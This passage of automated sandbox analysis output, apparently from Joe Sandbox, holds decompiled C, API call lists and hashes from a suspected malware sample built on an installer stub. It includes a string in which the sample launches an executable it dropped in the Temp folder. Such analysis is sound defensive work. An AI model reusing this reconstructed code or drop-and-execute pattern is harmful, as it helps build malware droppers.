                                                          0x00404198
                                                          0x0040419e
                                                          0x00000000
                                                          0x00000000
                                                          0x004041c3
                                                          0x004041c5
                                                          0x004041ca
                                                          0x00000000
                                                          0x004041ca
                                                          0x0040417e
                                                          0x00404053
                                                          0x00404056
                                                          0x0040405b
                                                          0x0040406c
                                                          0x0040406c
                                                          0x00404073
                                                          0x00404076
                                                          0x00404078
                                                          0x0040407d
                                                          0x00404086
                                                          0x0040408c
                                                          0x00404098
                                                          0x0040409b
                                                          0x004040a4
                                                          0x004040a9
                                                          0x004040ac
                                                          0x004040b1
                                                          0x004040c8
                                                          0x004040cf
                                                          0x004040e2
                                                          0x004040e5
                                                          0x004040fa
                                                          0x00404101
                                                          0x00404106
                                                          0x0040410b
                                                          0x0040410b
                                                          0x0040411a
                                                          0x00404129
                                                          0x0040412b
                                                          0x00404141
                                                          0x00404150
                                                          0x00404152
                                                          0x00000000

                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C8
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040DC
                                                          • SendMessageA.USER32 ref: 004040FA
                                                          • GetSysColor.USER32 ref: 0040410B
                                                          • SendMessageA.USER32 ref: 0040411A
                                                          • SendMessageA.USER32 ref: 00404129
                                                          • lstrlenA.KERNEL32(?), ref: 00404133
                                                          • SendMessageA.USER32 ref: 00404141
                                                          • SendMessageA.USER32 ref: 00404150
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041B3
                                                          • SendMessageA.USER32 ref: 004041B6
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041E1
                                                          • SendMessageA.USER32 ref: 00404221
                                                          • LoadCursorA.USER32 ref: 00404230
                                                          • SetCursor.USER32(00000000), ref: 00404239
                                                          • ShellExecuteA.SHELL32(0000070B,open,00422EC0,00000000,00000000,00000001), ref: 0040424C
                                                          • LoadCursorA.USER32 ref: 00404259
                                                          • SetCursor.USER32(00000000), ref: 0040425C
                                                          • SendMessageA.USER32 ref: 00404288
                                                          • SendMessageA.USER32 ref: 0040429C
                                                          Strings
                                                          • open, xrefs: 00404244
                                                          • N, xrefs: 004041CF
                                                          • C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw, xrefs: 0040420C
                                                          • @@, xrefs: 00404241
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: @@$C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw$N$open
                                                          • API String ID: 3615053054-2426900097
                                                          • Opcode ID: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
                                                          • Instruction ID: 2736236621597dd84b1265fd00406a521608d9db3f880d2da7511b3895ae30a3
                                                          • Opcode Fuzzy Hash: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
                                                          • Instruction Fuzzy Hash: 0161D1B1A40309BBEB109F60DC45B6A7BB9FB44715F10407AFB05BA2D1C7B8A9518F98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f28;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423720, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423f24;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                          0x0040100a
                                                          0x00401039
                                                          0x00401047
                                                          0x0040104d
                                                          0x00401051
                                                          0x0040105b
                                                          0x00401061
                                                          0x00401064
                                                          0x004010f3
                                                          0x00401089
                                                          0x0040108c
                                                          0x004010a6
                                                          0x004010bd
                                                          0x004010cc
                                                          0x004010cf
                                                          0x004010d5
                                                          0x004010d9
                                                          0x004010e4
                                                          0x004010ed
                                                          0x004010ef
                                                          0x004010ef
                                                          0x00401100
                                                          0x00401105
                                                          0x0040110d
                                                          0x00401110
                                                          0x00401112
                                                          0x00401118
                                                          0x0040111f
                                                          0x00401126
                                                          0x00401130
                                                          0x00401142
                                                          0x00401156
                                                          0x00401160
                                                          0x00401165
                                                          0x00401165
                                                          0x00401110
                                                          0x0040116e
                                                          0x00000000
                                                          0x00401178
                                                          0x00401010
                                                          0x00401013
                                                          0x00401015
                                                          0x0040101f
                                                          0x0040101f
                                                          0x00000000

                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,00423720,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
                                                          • Instruction ID: 28e048358fdb56e3a71f0bf3a5ff7a413e245bc8018749bf15ad205f69265f0b
                                                          • Opcode Fuzzy Hash: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
                                                          • Instruction Fuzzy Hash: 4241BA71804249AFCB058FA4DD459BFBBB9FF48315F00802AF951AA1A0C738AA50DFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405842 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 82%
                                                          			E00405842() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DDA(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fb0 =  *0x423fb0 + 1;
						return _t20;
					}
				}
				 *0x4226c0 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422138, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d38, "%s=%s\r\n", 0x4226c0, 0x422138);
						_t56 = _t55 + 0x10;
						_push( *((intOrPtr*)( *0x423f28 + 0x128)));
						_push(0x422138);
						E00405B16(_t43, 0x400, 0x422138);
						_t20 = E004057CB(0x422138, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405740(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405740(_t26 + 0xa, 0x4093a0);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040578C(_t51 + _t29, 0x421d38, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405AF4(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004057CB(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                          0x00405848
                                                          0x0040584f
                                                          0x00405853
                                                          0x0040585c
                                                          0x00405860
                                                          0x0040599f
                                                          0x0040599f
                                                          0x00000000
                                                          0x0040599f
                                                          0x00405860
                                                          0x0040586c
                                                          0x00405882
                                                          0x004058aa
                                                          0x004058b5
                                                          0x004058b9
                                                          0x004058d9
                                                          0x004058e0
                                                          0x004058e3
                                                          0x004058e9
                                                          0x004058ea
                                                          0x004058f7
                                                          0x004058fc
                                                          0x00405901
                                                          0x00405905
                                                          0x00000000
                                                          0x00000000
                                                          0x00405914
                                                          0x00405916
                                                          0x00405923
                                                          0x00405927
                                                          0x00405998
                                                          0x00405999
                                                          0x00000000
                                                          0x00405943
                                                          0x00405950
                                                          0x004059b5
                                                          0x004059bc
                                                          0x00405963
                                                          0x00405963
                                                          0x00405965
                                                          0x0040596e
                                                          0x00405979
                                                          0x0040598b
                                                          0x00405992
                                                          0x00000000
                                                          0x00405992
                                                          0x004059be
                                                          0x004059bf
                                                          0x004059c4
                                                          0x004059c6
                                                          0x004059d3
                                                          0x004059d3
                                                          0x004059d7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004059c8
                                                          0x004059c8
                                                          0x004059cb
                                                          0x004059ce
                                                          0x004059cf
                                                          0x00000000
                                                          0x004059c8
                                                          0x0040595b
                                                          0x00405960
                                                          0x00000000
                                                          0x00405960
                                                          0x00405927
                                                          0x00405884
                                                          0x0040588f
                                                          0x00405898
                                                          0x0040589c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040589c
                                                          0x004059a9

                                                          APIs
                                                            • Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                                                            • Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178), ref: 00405DF7
                                                            • Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405E08
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040588F
                                                          • GetShortPathNameA.KERNEL32 ref: 00405898
                                                          • GetShortPathNameA.KERNEL32 ref: 004058B5
                                                          • wsprintfA.USER32 ref: 004058D3
                                                          • GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D38,00000000,-0000000A,004093A0,00000000,[Rename]), ref: 00405979
                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040598B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405992
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405999
                                                            • Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
                                                            • Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                          • String ID: %s=%s$8!B$[Rename]
                                                          • API String ID: 3772915668-1989604195
                                                          • Opcode ID: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
                                                          • Instruction ID: 485c0dd97f26b0c044a9bc16f28733e4b9e22d15a5ab270111e081fcc94942a4
                                                          • Opcode Fuzzy Hash: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
                                                          • Instruction Fuzzy Hash: 6F4102B1604B01BBE7206B659D49F6B3A6CDF45725F04043AFA05F62D1E67CA8018EBE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405B16 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 170stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E00405B16(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				CHAR* _t31;
				signed int _t33;
				signed int _t34;
				signed int _t45;
				char _t47;
				CHAR* _t57;
				char _t61;
				signed int _t63;
				signed int _t75;
				char* _t76;
				signed int _t84;
				signed int _t86;
				void* _t87;

				_t75 = _a8;
				if(_t75 < 0) {
					_t75 =  *( *0x4236fc - 4 + _t75 * 4);
				}
				_t76 = _t75 +  *0x423f58;
				_t31 = 0x422ec0;
				_t57 = 0x422ec0;
				if(_a4 - 0x422ec0 < 0x800) {
					_t57 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t61 =  *_t76;
					_a11 = _t61;
					if(_t61 == 0) {
						break;
					}
					__eflags = _t57 - _t31 - 0x400;
					if(_t57 - _t31 >= 0x400) {
						break;
					}
					_t76 = _t76 + 1;
					__eflags = _t61 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t57 = _t61;
							_t57 =  &(_t57[1]);
							__eflags = _t57;
						} else {
							 *_t57 =  *_t76;
							_t57 =  &(_t57[1]);
							_t76 = _t76 + 1;
						}
						continue;
					}
					_t33 =  *((char*)(_t76 + 1));
					_t63 =  *_t76;
					_t84 = (_t33 & 0x0000007f) << 0x00000007 | _t63 & 0x0000007f;
					_v24 = _t63;
					_v16 = _t33;
					_t34 = _t33 | 0x00008000;
					_v20 = _t63 | 0x00008000;
					_t76 = _t76 + 2;
					__eflags = _a11 - 0xfe;
					_v12 = _t34;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t34 | 0xffffffff) - _t84;
								E00405B16(_t57, _t76, _t84, _t57, (_t34 | 0xffffffff) - _t84);
							}
							L32:
							_t57 =  &(_t57[lstrlenA(_t57)]);
							_t31 = 0x422ec0;
							continue;
						}
						__eflags = _t84 - 0x1d;
						if(_t84 != 0x1d) {
							__eflags = (_t84 << 0xa) + 0x424000;
							E00405AF4(_t57, (_t84 << 0xa) + 0x424000);
						} else {
							E00405A52(_t57,  *0x423f24);
						}
						__eflags = _t84 + 0xffffffeb - 7;
						if(_t84 + 0xffffffeb < 7) {
							L23:
							E00405D03(_t57);
						}
						goto L32;
					}
					__eflags =  *0x423fa4;
					_t86 = 2;
					if( *0x423fa4 != 0) {
						_t86 = 4;
					}
					_t45 = _v24;
					__eflags = _t45;
					if(_t45 >= 0) {
						__eflags = _t45 - 0x25;
						if(_t45 != 0x25) {
							__eflags = _t45 - 0x24;
							if(_t45 == 0x24) {
								GetWindowsDirectoryA(_t57, 0x400);
								_t86 = 0;
							}
							while(1) {
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								_t86 = _t86 - 1;
								_t47 = SHGetSpecialFolderLocation( *0x423f24,  *(_t87 + _t86 * 4 - 0x14),  &_v8);
								__eflags = _t47;
								if(_t47 != 0) {
									L18:
									 *_t57 =  *_t57 & 0x00000000;
									__eflags =  *_t57;
									continue;
								}
								__imp__SHGetPathFromIDListA(_v8, _t57);
								_a8 = _t47;
								__imp__CoTaskMemFree(_v8);
								__eflags = _a8;
								if(_a8 != 0) {
									break;
								}
								goto L18;
							}
							L20:
							__eflags =  *_t57;
							if( *_t57 == 0) {
								goto L23;
							}
							L21:
							__eflags = _v16 - 0x1a;
							if(_v16 == 0x1a) {
								lstrcatA(_t57, "\\Microsoft\\Internet Explorer\\Quick Launch");
							}
							goto L23;
						}
						GetSystemDirectoryA(_t57, 0x400);
						goto L20;
					}
					E004059DB(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t45 & 0x0000003f) +  *0x423f58, _t57, _t45 & 0x00000040);
					__eflags =  *_t57;
					if( *_t57 != 0) {
						goto L21;
					}
					E00405B16(_t57, _t76, _t86, _t57, _v16);
					goto L20;
				}
				 *_t57 =  *_t57 & 0x00000000;
				if(_a4 == 0) {
					return _t31;
				}
				return E00405AF4(_a4, _t31);
			}





















                                                          0x00405b1f
                                                          0x00405b24
                                                          0x00405b35
                                                          0x00405b35
                                                          0x00405b3f
                                                          0x00405b41
                                                          0x00405b48
                                                          0x00405b50
                                                          0x00405b56
                                                          0x00405b59
                                                          0x00405b59
                                                          0x00405cdd
                                                          0x00405cdd
                                                          0x00405ce1
                                                          0x00405ce4
                                                          0x00000000
                                                          0x00000000
                                                          0x00405b66
                                                          0x00405b6c
                                                          0x00000000
                                                          0x00000000
                                                          0x00405b72
                                                          0x00405b73
                                                          0x00405b76
                                                          0x00405cd0
                                                          0x00405cda
                                                          0x00405cdc
                                                          0x00405cdc
                                                          0x00405cd2
                                                          0x00405cd4
                                                          0x00405cd6
                                                          0x00405cd7
                                                          0x00405cd7
                                                          0x00000000
                                                          0x00405cd0
                                                          0x00405b7c
                                                          0x00405b80
                                                          0x00405b90
                                                          0x00405b97
                                                          0x00405b9a
                                                          0x00405b9f
                                                          0x00405ba2
                                                          0x00405ba5
                                                          0x00405ba6
                                                          0x00405baa
                                                          0x00405bad
                                                          0x00405c7b
                                                          0x00405c7f
                                                          0x00405caf
                                                          0x00405cb3
                                                          0x00405cb8
                                                          0x00405cbc
                                                          0x00405cbc
                                                          0x00405cc1
                                                          0x00405cc7
                                                          0x00405cc9
                                                          0x00000000
                                                          0x00405cc9
                                                          0x00405c81
                                                          0x00405c84
                                                          0x00405c99
                                                          0x00405ca0
                                                          0x00405c86
                                                          0x00405c8d
                                                          0x00405c8d
                                                          0x00405ca8
                                                          0x00405cab
                                                          0x00405c73
                                                          0x00405c74
                                                          0x00405c74
                                                          0x00000000
                                                          0x00405cab
                                                          0x00405bb3
                                                          0x00405bbc
                                                          0x00405bbd
                                                          0x00405bc1
                                                          0x00405bc1
                                                          0x00405bc2
                                                          0x00405bc5
                                                          0x00405bc7
                                                          0x00405bf9
                                                          0x00405bfc
                                                          0x00405c0c
                                                          0x00405c0f
                                                          0x00405c17
                                                          0x00405c1d
                                                          0x00405c1d
                                                          0x00405c59
                                                          0x00405c59
                                                          0x00405c5b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c24
                                                          0x00405c30
                                                          0x00405c36
                                                          0x00405c38
                                                          0x00405c56
                                                          0x00405c56
                                                          0x00405c56
                                                          0x00000000
                                                          0x00405c56
                                                          0x00405c3e
                                                          0x00405c47
                                                          0x00405c4a
                                                          0x00405c50
                                                          0x00405c54
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c54
                                                          0x00405c5d
                                                          0x00405c5d
                                                          0x00405c60
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c62
                                                          0x00405c62
                                                          0x00405c66
                                                          0x00405c6e
                                                          0x00405c6e
                                                          0x00000000
                                                          0x00405c66
                                                          0x00405c04
                                                          0x00000000
                                                          0x00405c04
                                                          0x00405be4
                                                          0x00405be9
                                                          0x00405bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00405bf2
                                                          0x00000000
                                                          0x00405bf2
                                                          0x00405cea
                                                          0x00405cf4
                                                          0x00405d00
                                                          0x00405d00
                                                          0x00000000

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000400), ref: 00405C04
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000400,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405C17
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C6E
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405CC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 4260037668-1027099803
                                                          • Opcode ID: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
                                                          • Instruction ID: fbd4eb8f0a1d10871977b41ef6ccbc0aa49b8648b95f2323881667dae7feb8a3
                                                          • Opcode Fuzzy Hash: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
                                                          • Instruction Fuzzy Hash: 955146B1E08B54ABEF215F748D84B6B3BA8DB11314F248277E512B62C1D23C99419F5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004026DF Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102memoryfilestringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E004026DF(void __ecx, void* __eflags) {
				void* _t23;
				void* _t29;
				long _t34;
				struct _OVERLAPPED* _t49;
				void* _t52;
				void* _t54;
				void* _t55;
				CHAR* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t51 = __ecx;
				 *((intOrPtr*)(_t61 - 0x3c)) = 0xfffffd66;
				_t55 = E00402A85(_t49);
				_t23 = E00405654(_t55);
				_push(_t55);
				if(_t23 == 0) {
					lstrcatA(E004055E7(E00405AF4("C:\Users\Albus\AppData\Local\Temp", "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
					_t56 = 0x4097f8;
				} else {
					_push(0x4097f8);
					E00405AF4();
				}
				E00405D03(_t56);
				E004057AC(_t56);
				_t29 = E004057CB(_t56, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					_t34 =  *0x423f2c;
					 *(_t61 - 0x2c) = _t34;
					_t54 = GlobalAlloc(0x40, _t34);
					if(_t54 != _t49) {
						E004032AF(_t49);
						E0040327D(_t54,  *(_t61 - 0x2c));
						_t59 = GlobalAlloc(0x40,  *(_t61 - 0x1c));
						 *(_t61 - 0x30) = _t59;
						if(_t59 != _t49) {
							E00402F71(_t51,  *((intOrPtr*)(_t61 - 0x20)), _t49, _t59,  *(_t61 - 0x1c));
							while( *_t59 != _t49) {
								_t51 =  *_t59;
								_t60 = _t59 + 8;
								 *(_t61 - 0x40) =  *_t59;
